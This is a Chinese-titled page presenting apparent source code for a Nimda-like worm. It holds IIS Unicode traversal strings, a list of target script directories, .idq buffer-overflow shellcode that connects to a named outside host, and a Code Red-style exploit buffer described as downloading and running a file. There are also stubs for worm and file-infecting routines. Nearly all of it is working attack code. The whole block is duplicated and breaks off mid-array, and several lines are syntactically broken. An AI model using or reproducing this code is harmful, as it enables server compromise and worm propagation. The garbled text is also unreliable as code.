Nimda源代码级揭秘
//WinME/XP UPNP 漏洞的shellcode声明
#define JUMPESP "\x47\x8f\xaa\x77"
#define MAX 10000
#define PORTx 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
file://定义常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
char *mybytes;
unsigned long sizemybytes;
MaxThread=100;//最大开100个线程扫描
file://下面定义漏洞数组
char *vers="KittyXP.a"//版本号
char *writer="Squirrel in Dalian"//作者?
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};
file://下面7个漏洞出现的目录,可以自己定义更多,但务必修改后改下面的for循环数字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};
unsigned char tftpdllbuff[]="";//这里存放的是Tftp.dll的二进制码
//unsigned char riched20dllbuff[]="";//这里存放的是riched20.dll的二进制码
file://声明函数
long GetLocalIP(void);//获得本机IP
DWORD WINAPI FindExeDir(LPVOID lp);//找到可执行目录
char *GetData(int SockFD);//获取SEND返回的数据
char * find(const char*pszSource,const char * pszKey);//在返回数据中查找指定字符串
DWORD WINAPI TFTP32();
//DWORD WINAPI Riched20()
int WINAPI redcode(char *argv[])
int WINAPI iis4(char *argv[])
int WINAPI xpmethd(char *argv[])
int WINAPI anitthd(char *argv[])
void WINAPI pevirus(char *argv[])
void WINAPI worm()
char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径
//下面是关于IIS5.0 .idq 漏洞的声明
#define RET 0x77e516de /* jmp or call ebx */
#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */
#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */
#define GMHANDLEA_OFFSET 24
#define GPADDRESS_OFFSET 61
#define OFFSET 234 /* exception handler offset */
#define NOP 0x41
#define MASKING 1
#if MASKING
#define PORTMASK 0x4141
#define ADDRMASK 0x41414141
#define PORTMASK_OFFSET 128
#define ADDRMASK_OFFSET 133
#endif
#define PORT 80
#define ADDR "www.squirrel2002.com.cn"//作者的主页?
#define PORT_OFFSET 115
#define ADDR_OFFSET 120
unsigned char shellcode[]=
"\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
#if MASKING
"\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
#endif
"\x8B\x46\xF8\xFF\xD0\x33\xC0"
"\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
"\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
"\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
unsigned char storage[]=
"\xEB\x02"
"\xEB\x4E"
"\xE8\xF9\xFF\xFF\xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";
unsigned char forwardjump[]=
"%u08eb";
unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int get_connection(int port)
{
struct sockaddr_in local,remote;
int lsock,csock,len,reuse_addr;
lsock = socket(AF_INET,SOCK_STREAM,0);
if(lsock<0)
{
// perror("socket");
return -1
}
reuse_addr = 1;
if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reuse_addr))<0)
{
//perror("setsockopt");
close(lsock);
return -1
}
memset((char *)&local,0,sizeof(local));
local.sin_family = AF_INET;
local.sin_port = htons(port);
local.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
{
//perror("bind");
close(lsock);
return -1
}
if(listen(lsock,1)<0)
{
// perror("listen");
close(lsock);
return -1
}
retry:
len = sizeof(remote);
csock = accept(lsock,(struct sockaddr *)&remote,&len);
if(csock<0)
{
if(errno!=EINTR)
{
//perror("accept");
close(lsock);
return -1
}
else
goto retry;
}
close(lsock);
return csock;
}
unsigned long __stdcall doweb(void *inr) {
char buf[1024];
SOCKET in = *((SOCKET *)inr);
recv(in,buf,1024,0);
send(in,mybytes,sizemybytes,0);
closesocket(in);
return 0;
}
//下面是redcode的shellcode
// this is the sploit code written by Dark Spyrit, it downloads a file and runs it
char sploit[] = { 0x47,
0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67,
0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B,
0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B,
0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF,
0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7,
0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54,
0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0,
0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50,
0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4,
0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33,
0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50,
0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1,
0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75,
0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92,
0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A,
0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43,
0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D,
0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF,
0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52,
0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF,
0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF,
0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC,
0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50,
0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D,
0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93,
0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90,
0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90,
0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54,
0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84,
0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95,
0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F,
0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E,
0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D,
0x0A };
#define JUMPESP "\x47\x8f\xaa\x77"
#define MAX 10000
#define PORTx 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
file://定义常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
char *mybytes;
unsigned long sizemybytes;
MaxThread=100;//最大开100个线程扫描
file://下面定义漏洞数组
char *vers="KittyXP.a"//版本号
char *writer="Squirrel in Dalian"//作者?
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};
file://下面7个漏洞出现的目录,可以自己定义更多,但务必修改后改下面的for循环数字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};
unsigned char tftpdllbuff[]="";//这里存放的是Tftp.dll的二进制码
//unsigned char riched20dllbuff[]="";//这里存放的是riched20.dll的二进制码
file://声明函数
long GetLocalIP(void);//获得本机IP
DWORD WINAPI FindExeDir(LPVOID lp);//找到可执行目录
char *GetData(int SockFD);//获取SEND返回的数据
char * find(const char*pszSource,const char * pszKey);//在返回数据中查找指定字符串
DWORD WINAPI TFTP32();
//DWORD WINAPI Riched20()
int WINAPI redcode(char *argv[])
int WINAPI iis4(char *argv[])
int WINAPI xpmethd(char *argv[])
int WINAPI anitthd(char *argv[])
void WINAPI pevirus(char *argv[])
void WINAPI worm()
char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径
//下面是关于IIS5.0 .idq 漏洞的声明
#define RET 0x77e516de /* jmp or call ebx */
#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */
#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */
#define GMHANDLEA_OFFSET 24
#define GPADDRESS_OFFSET 61
#define OFFSET 234 /* exception handler offset */
#define NOP 0x41
#define MASKING 1
#if MASKING
#define PORTMASK 0x4141
#define ADDRMASK 0x41414141
#define PORTMASK_OFFSET 128
#define ADDRMASK_OFFSET 133
#endif
#define PORT 80
#define ADDR "www.squirrel2002.com.cn"//作者的主页?
#define PORT_OFFSET 115
#define ADDR_OFFSET 120
unsigned char shellcode[]=
"\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
#if MASKING
"\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
#endif
"\x8B\x46\xF8\xFF\xD0\x33\xC0"
"\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
"\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
"\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
unsigned char storage[]=
"\xEB\x02"
"\xEB\x4E"
"\xE8\xF9\xFF\xFF\xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";
unsigned char forwardjump[]=
"%u08eb";
unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int get_connection(int port)
{
struct sockaddr_in local,remote;
int lsock,csock,len,reuse_addr;
lsock = socket(AF_INET,SOCK_STREAM,0);
if(lsock<0)
{
// perror("socket");
return -1
}
reuse_addr = 1;
if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reuse_addr))<0)
{
//perror("setsockopt");
close(lsock);
return -1
}
memset((char *)&local,0,sizeof(local));
local.sin_family = AF_INET;
local.sin_port = htons(port);
local.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
{
//perror("bind");
close(lsock);
return -1
}
if(listen(lsock,1)<0)
{
// perror("listen");
close(lsock);
return -1
}
retry:
len = sizeof(remote);
csock = accept(lsock,(struct sockaddr *)&remote,&len);
if(csock<0)
{
if(errno!=EINTR)
{
//perror("accept");
close(lsock);
return -1
}
else
goto retry;
}
close(lsock);
return csock;
}
unsigned long __stdcall doweb(void *inr) {
char buf[1024];
SOCKET in = *((SOCKET *)inr);
recv(in,buf,1024,0);
send(in,mybytes,sizemybytes,0);
closesocket(in);
return 0;
}
//下面是redcode的shellcode
// this is the sploit code written by Dark Spyrit, it downloads a file and runs it
char sploit[] = { 0x47,
0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
